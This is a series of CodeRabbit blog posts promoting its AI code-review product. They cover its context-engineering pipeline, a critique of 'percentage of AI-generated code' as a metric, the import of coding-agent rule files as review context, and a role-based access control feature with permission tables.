![](https://victorious-bubble-f69a016683.media.strapiapp.com/01fdb35154b77aea142483a82692c09e81f357087831d21119046c4093f57abc_995bd2a921.png) We break down the context in which CodeRabbit operates into three distinct parts: 1. **Intent**: What the developer or team aims to achieve with the code changes, including the purpose of a pull request, the problems they are trying to solve, and the intended outcomes. 2. **Environment**: The current technical state of the system, including file relationships, code dependencies, project structure, and existing patterns. 3. 
**Conversation:** The rest of the regular stuff that goes into a multi-turn LLM call, i.e., your chat messages, tool call responses, etc. When these elements are appropriately balanced and presented to an AI system, the result is an intelligent code reviewer that catches not just syntactic issues but also architectural inconsistencies, potential performance bottlenecks and opportunities for higher-level design improvements. ## Finding the context engineering sweet spot ![](https://victorious-bubble-f69a016683.media.strapiapp.com/1eb15da2ebd4622aaa859e32269774edad69adfc7e401aa23a81934e50757875_84c64a0946.png) Creating the proper context for AI-powered code review involves navigating several challenges. Here are three challenges that make context engineering particularly difficult. ### 1\. The Goldilocks problem for AI agents * **Too little context** leads to "hallucinations"—where the AI makes assumptions about missing information, often incorrectly. * **Too much irrelevant context** dilutes the signal, causing the AI to focus on unimportant aspects or become overwhelmed with information. * **Just the proper context** provides precisely what the AI Agent needs for accurate insights without *noise*. ### 2\. Token-by-token processing Unlike humans, who can quickly scan a document and mentally prioritise important sections, AI models process information token-by-token, giving equal weight to each piece of text. If we put all the code changes from a PR in the prompt, the AI may latch on to something insignificant and skip major issues. Curating the context is important. You need to prioritise important changes and discard the unimportant ones. ### 3\. Context window limitations Even the most advanced AI models have finite context windows, the maximum amount of text they can process at once. This limitation makes strategic context selection critical, especially for large codebases or complex pull requests. 
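The three challenges above can be made concrete with a small sketch. This is not CodeRabbit's pipeline. It is a minimal illustration of budgeted context selection, assuming each candidate piece of context already carries a relevance score. The names `ContextItem`, `estimate_tokens`, and `select_context`, the 4-characters-per-token estimate, and the `min_relevance` cutoff are all hypothetical.

```python
from dataclasses import dataclass


@dataclass
class ContextItem:
    name: str         # hypothetical label, e.g. a file path or "PR description"
    text: str         # the raw context that would go into the prompt
    relevance: float  # hypothetical score in [0, 1]; how it is computed is out of scope


def estimate_tokens(text: str) -> int:
    # Crude assumption: roughly 4 characters per token. Real tokenizers differ.
    return max(1, len(text) // 4)


def select_context(items, budget_tokens, min_relevance=0.2):
    """Greedily keep the most relevant items that fit within the token budget."""
    selected = []
    used = 0
    for item in sorted(items, key=lambda i: i.relevance, reverse=True):
        if item.relevance < min_relevance:
            break  # items are sorted, so everything after this is treated as noise
        cost = estimate_tokens(item.text)
        if used + cost <= budget_tokens:
            selected.append(item)
            used += cost
    return selected, used
```

The relevance cutoff addresses the "too much irrelevant context" side of the Goldilocks problem, and the budget check stands in for the context window limit. Skipping an oversized item rather than stopping lets smaller, still-relevant items fill the remaining budget.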
## The CodeRabbit approach to context engineering ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c16f4450b93d35e7b35aafcbe477187abee5119d0f5f985fb1133d5e8360a3cc_bab2745cad.png) At CodeRabbit, we've developed a multi-layered approach to context preparation that addresses these challenges and delivers consistently high-quality code reviews. Our system employs a sophisticated, non-linear pipeline designed to gather, filter, and structure context in ways that maximise AI comprehension. The diagram above lists just some of the dozens of sources of context we draw on in our context preparation process. ### Intelligent repository and PR information collection ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ffacb1ad99374b29a226cf2550118e05fafb6f6a60e927535bd95c65b0137ba5_090100f62a.png) Our context preparation begins with extracting the most relevant information about the pull request itself: * **Metadata**: We collect essential data like PR title, description, and affected commit range to determine the "why" behind code changes. * **Differential analysis**: For incremental reviews, we calculate exact changes since the last review, ensuring the agent focuses only on what's new or modified. * **Path filtering**: Our system distinguishes between meaningful code changes and [ancillary files](https://docs.coderabbit.ai/guides/review-instructions/#default-blocked-paths) (like generated assets or dependencies), focusing the AI's attention on what truly matters. ### Knowledge integration from multiple sources ![](https://victorious-bubble-f69a016683.media.strapiapp.com/184539d85d7668c1aeb0ec36654d0fcafbbeb7d4444cafe0d017f904e6167e21_6f64a8f6a5.png) A great code review requires more than examining the current changes in isolation. 
Next, we work on understanding the broader technical and business context: * **Historical learnings**: We employ a vector database to store our agent’s learnings from past reviews, allowing the system to recall relevant feedback patterns and user preferences so it can structure review comments with these in mind. * **PR intent analysis**: We analyse PR descriptions and related issues to extract the underlying objectives of changes, ensuring CodeRabbit's review aligns with developer goals. * **Code Graph Analysis**: We then construct a graph representation of code dependencies to help the AI understand how files interrelate, enabling reviews that consider architectural impact. ### Strategic context assembly ![](https://victorious-bubble-f69a016683.media.strapiapp.com/9587da529f6165278bb96e1ace81eba4d0f602a5c489cd3aec003cbf96b3bdaf_faaa76151d.png) Once we have gathered all the raw information required for reviewing, we optimize how the prompt is packaged for the AI agent. ### Prompt engineering ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ff8c9119531afb00d17cb1ea2e79677b5dbb736018260b1cf03812f5bd3e26fe_2a0e6c99dd.png) The next stage of our review pipeline involves crafting the perfect instructions for the AI. We average a 1:1 ratio of code to context in our prompts, which shows how important context is: * **Level-appropriate prompts**: We adjust the review depth based on file complexity and importance, ranging from basic checks to in-depth architectural analysis. For different complexity levels, we use different prompts and models. * **Structured review guidelines**: Clear instructions help the AI Agent focus on the most valuable types of feedback for each specific situation, based on our own historical data on helpful review comments. * **Context Enrichment**: The prompts include relevant project coding standards, patterns, and historical insights that guide the AI toward company-specific best practices. 
* **Context Selection**: We perform a final pass over the context, using the results of the earlier context-preparation agents, to cut noise. ### Verification agents ![](https://victorious-bubble-f69a016683.media.strapiapp.com/92e8bb9edf6f2c2bf1c446f369f46c4e5c9abc10eb089433a20da5dd60e86572_86698a4754.png) The final stage of our review process is our verification system, an AI-powered quality assurance layer that automatically validates and improves review comments. It’s activated when the AI reviewer needs to double-check its findings. ## Impact of context engineering on review quality ![](https://victorious-bubble-f69a016683.media.strapiapp.com/512763d825788bbfd2e740dced1618137418b685dc43f4369459dbde3b74b2c2_d66829bbdb.png) The sophistication of our context preparation pipeline directly translates to tangible benefits in review quality, including: ### Reduced false positives By providing the AI with the proper context, we dramatically reduce irrelevant or incorrect suggestions that waste developer time, such as changes to function calls that don’t align with the team’s coding standards. The system understands project-specific conventions and avoids flagging intentional patterns as issues. ### Deeper architectural insights With more knowledge of code relationships and project structure, CodeRabbit can identify architectural issues that simple linting tools or pattern matching will miss. For example, many of our customers recount how CodeRabbit is able to flag when changes in a PR will affect other dependencies in their codebase. ### Consistent application of best practices By incorporating historical learnings and team-specific knowledge, we consistently apply coding standards and best practices across all reviews. 
We continue to make it easier for teams to share their coding guidelines – including recently enabling the ability to [import coding guidelines](https://www.coderabbit.ai/blog/code-guidelines-bring-your-coding-rules-to-coderabbit?) from your favorite coding agent. ### Enhanced learning over time Our approach enables the system to improve with each review, building a growing knowledge base of project-specific insights that make future reviews even more valuable. ## The importance of good context engineering Context is not merely a technical requirement for LLMs, but a requirement for effective AI Agents. By thoughtfully gathering, filtering, structuring, and presenting the context, CodeRabbit doesn't just review code. Instead, it understands code in its full complexity so that it can provide insights that make developers more productive, code more robust, and teams more effective. This is increasingly important as AI coding agents currently tend to generate a significant amount of AI slop. This is only the beginning of context engineering for AI code reviews – we are always refining our approach to improve review quality. With model capabilities constantly expanding, we’ll be able to do much more in the future. ***Interested in seeing how context makes a difference in our code reviews?*** [***Start your 14-day trial!***](https://coderabbit.link/fOmVdcW)

What percentage of your code should be AI-generated?

Sahil Mohan Bansal — Tue, 08 Jul 2025 00:00:00 GMT

We’ll come clean: That title is mostly clickbait. This isn’t an article where we tell you that 20% or 30% or even 50% of your codebase ***should*** be AI-generated. We’re writing this because it’s looking like very soon ***someone*** could be telling you that. Maybe your boss. Or your C-suite. In April, both [Google](https://shivammore.medium.com/ai-is-writing-over-30-of-googles-code-539e46e0b8c0) and [Microsoft](https://techcrunch.com/2025/04/29/microsoft-ceo-says-up-to-30-of-the-companys-code-was-written-by-ai/) came out publicly with claims that up to 30% of their new or existing code was AI-generated. What’s interesting is that both Microsoft and Google decided to quantify their AI usage in similar percentages during the same month. Even more notable is where they made these claims. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/790a4addfdc8fc7ad3bcaa27c01b79e22ffc1e8ff232474a38364516b7f8b0a3_9b66d7f6ff.png) Google’s Sundar Pichai shared that stat in an earnings call – and this wasn’t the first time he talked about AI-generated code at Google in this way. During Google’s November 2024 earnings call, Pichai stated that [25% of Google’s new code](https://www.forbes.com/sites/jackkelly/2024/11/01/ai-code-and-the-future-of-software-engineers/) was AI-generated. So, he explicitly framed it as an update for investors on Google’s progress at implementing AI. Not to be outdone, Microsoft’s Satya Nadella came out a few days later during a fireside chat with Mark Zuckerberg at LlamaCon with the claim that [20% to 30% of Microsoft’s codebase](https://www.cnbc.com/2025/04/29/satya-nadella-says-as-much-as-30percent-of-microsoft-code-is-written-by-ai.html) was AI-generated. What we likely saw in those two updates was the birth of a new metric that investors and executives will believe says something important about the state or future of a business. But what does a percentage like that *really* say? 
And, if it’s going to be used more widely as a way to measure AI adoption or a business’ competitiveness, how would companies and developers even decide what the ‘right’ percentage looks like? ## AI vanity metrics are the darlings of investors and execs ![](https://victorious-bubble-f69a016683.media.strapiapp.com/8086b45094308d0c29c1a932f0bb4da1839b30e9f7c7978ab5cbb9ecf477dee9_edf0858842.png) If you wondered why so many publicly traded companies rushed in 2023 and 2024 to share their ‘AI strategy,’ it’s because the stock market rewarded them for it. With investors projecting both revenue increases and cost savings from adopting AI, the stock prices of companies who [announced an AI strategy](https://www.wallstreetzen.com/blog/ai-mention-moves-stock-prices-2023/#:~:text=1) increased by 2% more on average than companies that didn’t. But 67% of companies had even better results – their stock prices soared over 6% higher. BuzzFeed’s stock even went up a [whopping 120%](https://mediagazer.com/230126/p10#:~:text=BuzzFeed%20stock%20jumped%20120,some%20of%20its%20content%20creation) just for announcing they planned to use generative AI to create content. Companies that didn’t articulate their AI strategy were generally punished in publicly traded markets. AI adoption has since become a key priority for Executives – both for the actual business benefits it promises AND for the stock price increases they now rely on whenever they announce new AI investments or adoption. That’s leading to what some have characterized as a toxic culture in some companies where all AI adoption is counted as good AI adoption because it makes investors and executives happy – and gives the veneer of increased productivity and velocity. 
In April, [Lead Dev wrote](https://leaddev.com/culture/ai-coding-mandates-are-driving-developers-to-the-brink) about how companies are now instituting AI coding mandates and how that’s – in their words – “driving developers to the brink.” These mandates can be anything from the request to increase the number of suggestions you accept from AI coding agents to public leaderboards ranking AI usage by employee to vague performance-based OKRs where devs are simply expected to use AI ‘more’ from quarter to quarter. The problem? Like many metrics, they’re blunt ways to measure and incentivize behaviors that have complex outcomes. This is demonstrated in the comments of a [Reddit post](https://www.reddit.com/r/ExperiencedDevs/comments/1j7aqsx/ai_coding_mandates_at_work/) the Lead Dev article links to. Says one dev: “At our monthly engineering all hands, they give us a report on our org’s usage of Copilot (which has slowly been increasing) and tell us that we need to be using it more. Then, a few slides later we see that our severe incidents are also increasing.” It’s clear there’s a disconnect between engineers and executives on the benefits of AI coding tool use. An [Atlassian survey](https://www.atlassian.com/software/compass/resources/state-of-developer-2024) of over 2,000 IT managers and developers in 2024 showed that leaders listed AI as the most important factor in improving developer productivity and satisfaction but only a third of developers reported experiencing AI-related productivity gains. By only measuring AI use and not the quality of the code that AI generates or the actual time saved once debugging and more involved code reviews are factored in, you could be incentivizing AI use even when AI use hurts your company. In that case, you might achieve 50% of your codebase being AI generated while also adding exponentially more bugs to your code and increasing issues and customer complaints. 
And to make it worse, you might ALSO not be saving any time since your devs could be spending an equal amount of time [reviewing](https://x.com/ryancarson/status/1925283219995259034) and [fixing that code](https://x.com/vatvb/status/1927206140066021439) as they would have if they wrote it from scratch. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/09467c567900570583948e016a44b4fc84df55ceb289db5a1379b60561b72ea7_65cc75a7b2.jpg) But your AI usage would sound impressive during an earnings call, right? ## What percentage of AI code is too much? ![](https://victorious-bubble-f69a016683.media.strapiapp.com/bcd4c3f0fb5f24d7d442577697a475244b98c33df8b229878451b3055510374c_ce987c79c2.png) While companies like Google and Microsoft are racing to make as much of their codebase as possible AI generated – and Microsoft’s CTO is even predicting that [95% of all code will be AI generated](https://www.techspot.com/news/107411-microsoft-cto-predicts-ai-generate-95-percent-code.html) by 2030 – it’s unlikely other companies are aiming that high. On a YC podcast back in March, Jared Friedman, Y Combinator Managing Partner claimed that a quarter of the accelerator’s current cohort have [codebases that are 95% generated by AI](https://techcrunch.com/2025/03/06/a-quarter-of-startups-in-ycs-current-cohort-have-codebases-that-are-almost-entirely-ai-generated/). I’ll summarize (and sanitize) the [YouTube comments](https://www.youtube.com/watch?v=IACHfKmZMr8) on that one for you: Most devs, unsurprisingly, felt that having a codebase that was 95% AI-generated was a recipe for disaster. It appears we have a Goldilocks dilemma here. There is a magic number that is neither too low, nor too high but just right when it comes to AI-generated code. But what is it? At what point does your code become *too* AI-generated? Is it 40%? 50%? 75%? Over 75%? Does it depend on the application? The language? Does it vary from one company to another? 
And what are you actually saying about a company by sharing this percentage? ## Should percentage of code be a metric that’s tracked? ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c0588d874126ed42a732d75d4461f9a92cdcd2e6c22df6dddc2e3a9c2be8c880_e94c47c118.png) To answer this question, let’s dig into what this metric might actually be measuring. When companies like Google and Microsoft say 30% of their code is AI-generated, what are they counting? Usually, this refers to the number of lines or commits that originated from AI coding tools like Copilot, Cursor, Claude, or Windsurf. But raw lines of code is a notoriously poor metric of productivity or value. And that doesn’t account for the lines AI wrote that were then heavily edited. AI coding tools often excel at writing boilerplate or repetitive code—exactly the kind of low-complexity, low-value code that developers could produce rapidly themselves anyway. Counting these easy wins inflates AI adoption numbers without necessarily indicating meaningful productivity gains. Another challenge is that developers report frequent and concerning hallucinations like making up API keys that don’t exist. More critically, a metric based purely on volume doesn’t capture the complexity or quality of the code generated. It doesn’t tell you how much developer time was needed to debug or review the AI-generated code. Without these nuances, a 30% metric means almost nothing about actual efficiency or quality outcomes. Developer forums and surveys consistently highlight frustration at AI-generated code's tendency to introduce more bugs and vulnerabilities with one survey estimating that AI coding tools add up to [41% more bugs](https://www.cio.com/article/3540579/devs-gaining-little-if-anything-from-ai-coding-assistants.html). 
For example, Harness recently [released a survey](https://www.harness.io/state-of-software-delivery) that revealed 67% of developers spend more time debugging AI-generated code than human-generated code and 68% spend more time resolving security issues. Even worse was that 59% in the Harness survey said that they experienced problems with deployments at least half the time they used AI coding tools. Perhaps, for this reason, it’s not surprising why companies that are selling coding agents, like Microsoft, might want teams to adopt ‘percentage of the codebase’ as a success metric over others that give a more holistic view of the use of AI in development. But misguided OKRs, rigid quotas, and public leaderboards of each developer’s AI use ignore context and quality, leading developers to spend more time chasing meaningless metrics than delivering high-quality software. If you’re trying to measure the value of your AI investment, there are much better metrics to track. ## ‘Percentage of code’ metrics seem focused on cost cutting ![](https://victorious-bubble-f69a016683.media.strapiapp.com/6030e98854b2ff961e4b707e8c54c0d6afcbf0af7f5d848895d1f1968b73fe6f_87174a5f58.png) What’s more concerning is that many devs report that AI mandates like these are often connected to hiring freezes at their companies – with [entry-level jobs being hit harder](https://sfstandard.com/2025/05/20/silicon-valley-white-collar-recession-entry-level/). 
That suggests many execs share the ‘optimism’ that AI will replace developers – something that people like Meta CEO [Mark Zuckerberg](https://www.inc.com/kit-eaton/mark-zuckerberg-plans-to-replace-some-coders-with-ai-which-might-prove-tricky/91140118), Salesforce CEO [Marc Benioff](https://www.itpro.com/software/development/maybe-we-arent-going-to-hire-anybody-this-year-marc-benioff-says-salesforce-might-not-hire-any-software-engineers-in-2025-as-the-firm-reaps-the-benefits-of-ai-agents#:~:text=Development-,'Maybe%20we%20aren't%20going%20to%20hire%20anybody%20this%20year,the%20benefits%20of%20AI%20agents) and AWS CEO [Matt Garman](https://www.hrgrapevine.com/us/content/article/2024-08-22-amazon-cloud-ceo-warns-software-engineers-ai-could-replace-your-coding-work-within-2-years) are talking about publicly a lot these days. In early 2025, Benioff [shared his plans on a podcast](https://www.itpro.com/software/development/maybe-we-arent-going-to-hire-anybody-this-year-marc-benioff-says-salesforce-might-not-hire-any-software-engineers-in-2025-as-the-firm-reaps-the-benefits-of-ai-agents) saying, “Maybe we aren’t going to hire anybody this year. We have seen such incredible productivity gains because of the agents.” If this seems overly optimistic about AI’s potential to you, you’re right to feel that way. After all, Microsoft’s Nadella even admitted that they were seeing [‘mixed results’](https://techcrunch.com/2025/04/29/microsoft-ceo-says-up-to-30-of-the-companys-code-was-written-by-ai/) with AI-generated code in certain languages with their own Copilot tool in the LlamaCon chat. The problem with metrics like this is that many companies now believe that the use of AI-generated code is a way to reduce costs by replacing developers – or, at least, reducing their numbers. 
But, if you're measuring what percentage of your codebase is AI-generated because you believe you’ll eventually be able to cut your workforce by 50% once you achieve 50% AI code, you’re going to be sadly mistaken. In that case, adopting this metric could put companies on a collision course – not just to create more technical debt and issues – but also to disappoint investors. Either those layoffs won’t materialize or, if they do, they’ll lead to increased issues and noticeable quality degradations that will impact a company’s bottom line. ## Metrics developers actually need ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f0f7bdcc7cfb6e87104ed2558906f9e849cebf9c3fe49a04be16c583649c6675_8f1352e154.png) Instead of just measuring raw code generated, companies should be measuring the quality of that code and the ***true*** productivity impact of AI adoption. For example, in addition to AI usage and adoption metrics, companies should also track: * Bug rates before and after adopting AI coding tools. * Deployment stability (frequency of production incidents) against AI usage. * Actual time saved in the full development lifecycle once debugging and more complex code reviews are added in. * Developer satisfaction and productivity based on qualitative feedback. Another strategy is to follow what ChargeLab has done. Mentioned in the [LeadDev article](https://leaddev.com/culture/ai-coding-mandates-are-driving-developers-to-the-brink), it has a more dev-focused AI strategy. Its developers choose their AI tools freely, which resulted in a measured 40% productivity increase. This increase was not driven by mandates but by empowering developers with context-specific and meaningful metrics they themselves set and allowing them to have choice over their tools. 
Another [LeadDev article](https://leaddev.com/technical-direction/why-developers-and-their-bosses-disagree-over-generative-ai) also suggested that AI adoption shouldn’t be narrowly focused on code generation since productivity gains can equally be had at [other parts of the software development lifecycle](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack?) like code reviews, refactoring, testing and documentation. Metrics around how much of your codebase is AI-generated ignore the potential savings from those areas. Indeed, the DORA report on the [Impact of AI in Software Development](https://dora.dev/research/ai/gen-ai-report/) outlined 5 strategies for ensuring AI actually helps with productivity gains. The first strategy? Use AI at all stages of the development cycle, not just for code generation. The use of AI throughout the entire development cycle is becoming so common, that we flagged it as the [main development trend we expect to see in 2025](https://www.coderabbit.ai/blog/2025-the-year-of-the-ai-dev-tool-tech-stack?) in a post last month. ## Creating useful AI adoption metrics: best practices ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b95ec72f140e284500f9c962bdce7dd2abb88d253a4be87e75b73bf6d8b36dd7_cc02a4daa2.png) Effective AI adoption metrics should come directly from engineering teams themselves, not from executives disconnected from the realities of the company’s codebase. Metrics should: * Be developed in collaboration with engineers who understand day-to-day workflows. * Align with real productivity and business outcomes, not superficial adoption targets. * Encourage flexible, context-aware experimentation rather than rigid enforcement. ChargeLab's strategy, for example, involved setting a broad organizational goal (e.g., saving [$1 million annually](https://leaddev.com/culture/ai-coding-mandates-are-driving-developers-to-the-brink) in dev time by using AI) but giving teams freedom in how to achieve it. 
It balances clear direction with developer empowerment, focusing on measurable, meaningful outcomes instead of simplistic quotas that are narrowly limited to the use of one universal tool. Such a metric would allow developers to decide to write code manually when it makes more sense to and to save time at the code review or QA/testing phase by deploying AI tools there instead. ## Should we track AI-generated code percentages at all? Ultimately, "percentage of AI-generated code" as a standalone metric has limited value. It’s too simplistic, incentivizes the wrong behaviors, and risks causing developer frustration. Instead, engineering leaders and developers should focus on metrics tied explicitly to productivity, code quality, and developer satisfaction. These nuanced, outcome-oriented metrics provide true insight into AI’s impact far beyond what a simplistic “percentage of your codebase” metric could ever convey. ***Want to try an AI tool that will help you ship better code faster? Start a*** [***14-day CodeRabbit trial***](https://app.coderabbit.ai/login???free-trial&_gl=1*qpc7tl*_gcl_au*MjAwMTM2Mjk0MC4xNzQ0OTI5MzMx*_ga*NTAxMzUzODg4LjE3NDQ5MjkzMzE.*_ga_7YWHDJSXQ1*czE3NTE5MTk2NjIkbzk2JGcwJHQxNzUxOTE5NjYyJGo2MCRsMCRoMzAyMTEwNjM.) ***today!***

Code Guidelines: Bring your coding rules to CodeRabbit

Edgar Cerecerez — Wed, 02 Jul 2025 00:00:00 GMT

If you're using or have tried out Cursor or another AI coding tool (who hasn't?), chances are you've also seen the downsides of it. Maybe you have to keep repeating how the project should be structured whenever it creates new files. Or that you're using shadcn/ui for UI components. Or that a build requires another command to build a backend dependency first. Cursor, Windsurf, Copilot, and other AI coding agents addressed this problem by adding support for reusable, scoped instructions that can be read on every ask – or when requested. Smart move! ## **Using Code Guidelines** CodeRabbit will automatically detect your coding rules for: * Cursor `.cursorrules` * GitHub Copilot `.github/copilot-instructions.md` * Cline `/.clinerules/*` * Windsurf `/.windsurfrules` * Claude `/CLAUDE.md` * And more With Code Guidelines, these rules are used as context on every PR review. We also support adding your own rules by specifying a custom file pattern. Got your guidelines in docs/STANDARDS.md or team/code-style.txt? Just add the pattern and CodeRabbit will pick it up. ## **Why it matters** This has huge implications. For one, that means CodeRabbit will follow the same rules you set with your AI coding agent. No more context switching. No more explaining the same standards twice. It also gives you a way to specify exactly how CodeRabbit should do a PR review and what best practices you want the CodeRabbit review agent to follow. Now, you can just add these guidelines to your rules (be it from Cursor, GitHub, etc.) and: * **Enforce style and formatting consistency** - If your `.cursorrules` say "use camelCase for functions, PascalCase for components," CodeRabbit will flag violations during review. * **Maintain architecture patterns** - Define your preferred file structure, module boundaries, or dependency rules once and CodeRabbit ensures every PR follows them. 
* **Apply team-specific standards** - Whether it's "always use early returns" or "prefer composition over inheritance," your unique team preferences become part of every review. ## **What's next?** CodeRabbit’s not-so-secret magic to PR reviews is the level of context engineering it does. Code Guidelines make CodeRabbit’s reviews even better by adding your coding rules. As for what’s next, I'll give you a hint: context is king. Stay tuned. ***If you haven't tried CodeRabbit yet, there's never been a better time.*** [***Get started for free***](https://coderabbit.link/hUbDimn) ***and start cutting your code review time (and bugs) in half.***

Role-Based Access Control (RBAC) for granular permission sets

Sahil Mohan Bansal — Mon, 16 Jun 2025 00:00:00 GMT

Hey folks - we’re excited to share that Role-Based Access Control (RBAC) is now available for all CodeRabbit customers. This gives your Org Admins the ability to assign granular permission sets that control the actions that users can take. You can find these settings under the [Subscriptions menu](https://app.coderabbit.ai/settings/subscription) in the CodeRabbit app.

We have defined three main roles, each with different permissions as they pertain to CodeRabbit settings and configurations:

1. **Admins:** Full access with the ability to run code reviews and configure everything in CodeRabbit: review settings, manage integrations, assign roles, edit learnings, view dashboards, generate reports, and manage subscription and billing.
2. **Members:** Limited access with the ability to run code reviews, with read-only permissions to access org or repo level settings, integrations, learnings, dashboards, reports, and subscription details.
3. **Billing Admins:** Optional role that is only responsible for subscription and billing management. This role has no ability to configure settings or have code reviewed, and it is not a paid seat.

The roles are assigned separately for each Org. If you have multiple Orgs, then roles in one Org do not apply to other Orgs. Only “Admin” users can change these roles and add other users as “Admins”, “Members” or “Billing Admins.”

![](https://victorious-bubble-f69a016683.media.strapiapp.com/a141c6d293aca4488139432800827be3087f63634159c8a9442be3440ace6ff1_32f331a40d.png)

*New roles can be found under the Subscription menu*

Note that bot users are automatically assigned a “Member” role and this cannot be changed. Only users that have a CodeRabbit seat assigned to them can have their role changed by an admin.
## CodeRabbit role permissions

We recommend assigning the “Billing Admin” role to users who will only be responsible for managing the financial aspects of your CodeRabbit subscription, such as adding new users, increasing the number of seats, changing plans, etc. If you do not have a dedicated person who will act as a “Billing Admin” then any other “Admin” in your Org can also perform all billing and subscription tasks.

You’ll need to assign the “Admin” role to users who must have write access to every feature and config setting in CodeRabbit. Other users who are primarily concerned with running AI code reviews may be limited to the “Member” role.

Here is a detailed matrix that explains the different permission sets for each of the three roles.

| **Resource** | **Admin** | **Member** | **Billing Admin** |
| --- | --- | --- | --- |
| Org Settings | Write | Read-only | No access |
| Repo Settings | Write | Read-only | No access |
| Integrations | Write | Read-only | No access |
| Learnings | Write | Read-only | No access |
| Dashboards | Write | Read-only | No access |
| Reports | Write | Read-only | No access |
| User Management | Write | Read-only | Read-only |
| Subscription Management | Write | Read-only | Write |
| Billing Management | Write | No access | Write |

Note that “Admins” have the same level of access that “Billing Admins” do, but the reverse is not true. Every “Admin” can perform the same tasks that a “Billing Admin” can.

Any user that must only be a “Billing Admin” needs to be invited manually by an “Admin.” The screenshot below shows how an “Admin” can invite another “Billing Admin” using their email, if that user does not exist in your Git platform.

Also, for users with the “Member” role, the metrics in the dashboards will only be visible for the Team that they are a part of in their Git platform.
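The permission matrix above can be read as a simple lookup table. The following is a minimal sketch of that idea, assuming hypothetical identifiers (`Access`, `PERMISSIONS`, `is_allowed`, and the snake_case resource and role keys); it mirrors the published matrix but is not how CodeRabbit implements RBAC internally.

```python
from enum import IntEnum


class Access(IntEnum):
    """Access levels ordered so that a higher level includes the lower ones."""
    NONE = 0
    READ = 1
    WRITE = 2


N, R, W = Access.NONE, Access.READ, Access.WRITE

# One row per resource, one column per role, copied from the matrix.
PERMISSIONS = {
    "org_settings":            {"admin": W, "member": R, "billing_admin": N},
    "repo_settings":           {"admin": W, "member": R, "billing_admin": N},
    "integrations":            {"admin": W, "member": R, "billing_admin": N},
    "learnings":               {"admin": W, "member": R, "billing_admin": N},
    "dashboards":              {"admin": W, "member": R, "billing_admin": N},
    "reports":                 {"admin": W, "member": R, "billing_admin": N},
    "user_management":         {"admin": W, "member": R, "billing_admin": R},
    "subscription_management": {"admin": W, "member": R, "billing_admin": W},
    "billing_management":      {"admin": W, "member": N, "billing_admin": W},
}


def is_allowed(role, resource, needed=Access.READ):
    """Return True if `role` has at least the `needed` access on `resource`."""
    return PERMISSIONS[resource][role] >= needed


print(is_allowed("member", "org_settings"))                      # read check
print(is_allowed("member", "org_settings", Access.WRITE))        # write check
print(is_allowed("billing_admin", "billing_management", Access.WRITE))
```

Ordering the access levels makes the "Admins can do everything Billing Admins can, but not the reverse" rule fall out of the data: every Admin cell is at least as high as the matching Billing Admin cell.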
![](https://victorious-bubble-f69a016683.media.strapiapp.com/76aba7b4c4d3df67ff5c679625f8207a0d08cc525700150367b6339087057b4d_620aef76b6.png)

*Invite Billing Admins using their email*

Users that are added as Billing Admins, and those that do not exist in your Git platforms, must log in using the [Login with Email](https://app.coderabbit.ai/sign-in-with-email/coderabbitai) option instead of their Git platform credentials.

## Role mapping from Git platform to CodeRabbit

Some roles are assigned by default for all users that exist in your Git organization. You can review these under the “users” menu. The default roles are mapped from the permissions each user has in your Git platform organization and are automatically inherited by CodeRabbit. You will have to manually assign roles to users if you want to change CodeRabbit’s default assignment, which is based on the mapping rules below.

| **GitHub** | **GitLab** | **Azure DevOps** | **Bitbucket** | **Default Mapping to CodeRabbit Role** |
| --- | --- | --- | --- | --- |
| Admin / Billing Manager | Owner | Admin | Owner | Admin |
| Member | Maintainer | | Member | Member |
| | Developer | | | Member |
| | Reporter | | | Member |
| | Planner | | | Member |
| | Guest | | | Member |
| | Minimal Access | | | Member |
| Added Manually | Added Manually | Added Manually | Added Manually | Billing Admin |

Note that Azure DevOps only reports “Admin” users. If a user exists in an Azure DevOps organization and is not an “Admin” then we assign the “Member” role to them by default.

## TL;DR

The TL;DR for the RBAC roll-out:

1. You can now assign three different roles to CodeRabbit users:
   * Admins - run code reviews with write access to configure everything
   * Members - run code reviews with read-only access for various configs
   * Billing Admins - special role, only if a dedicated user must be the one to manage billing and subscription
2. CodeRabbit roles for new and existing users are automatically mapped to equivalent roles in your Git platforms. Only CodeRabbit “Admins” can change these roles.
3. All roles are mapped to a specific Org. Users in multiple Orgs can have different roles in each Org.
4. Users with “Admin” equivalent roles in their Git platform must be the ones to initiate a CodeRabbit trial.

Have questions or feedback? Reach out to our team via our community [Discord server](https://discord.gg/coderabbit) (for free users). Paying CodeRabbit customers and those in an active free trial period can contact our technical team via this [support page](https://www.coderabbit.ai/contact-us/support) for a faster response. Please provide your Org name when you reach out.

## What’s next?

We continue to listen to our customers and incorporate their feedback. The following features are on our near to medium term roadmap:

1. Expanding RBAC to our self-hosted customers. The v1 RBAC release is limited to SaaS customers only
2. Ability for “Member” level users to start a CodeRabbit trial
3. Custom role definitions where admins can pick and choose a custom set of permissions and create new roles
4. Consistent role availability across all organizations configured with CodeRabbit
5. SSO integration (SAML / OIDC)

Next steps for you: [Log in to CodeRabbit](https://app.coderabbit.ai/login), navigate to the Subscriptions menu and review or change the CodeRabbit roles for users in your organization. You can also refer to the [documentation](https://docs.coderabbit.ai/guides/roles) for more details.
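As a rough illustration of the default role mapping described in this post, the sketch below encodes the mapping table as data. The names `ADMIN_EQUIVALENTS` and `default_role`, the platform keys, and the `added_manually` flag are assumptions made for this example; treating any unlisted platform role as “Member” is also an assumption, extrapolated from the Azure DevOps note.

```python
# Git platform roles that map to the CodeRabbit "Admin" role by default,
# taken from the mapping table. Platform keys are hypothetical identifiers.
ADMIN_EQUIVALENTS = {
    "github": {"Admin", "Billing Manager"},
    "gitlab": {"Owner"},
    "azure_devops": {"Admin"},
    "bitbucket": {"Owner"},
}


def default_role(platform, platform_role, added_manually=False):
    """Return the default CodeRabbit role for a user.

    Users invited manually by email (not present in the Git platform)
    become Billing Admins; admin-equivalent platform roles become Admins;
    everyone else defaults to Member.
    """
    if added_manually:
        return "Billing Admin"
    if platform_role in ADMIN_EQUIVALENTS[platform]:
        return "Admin"
    return "Member"


print(default_role("gitlab", "Owner"))
print(default_role("gitlab", "Developer"))
print(default_role("azure_devops", None))  # Azure DevOps only reports Admins
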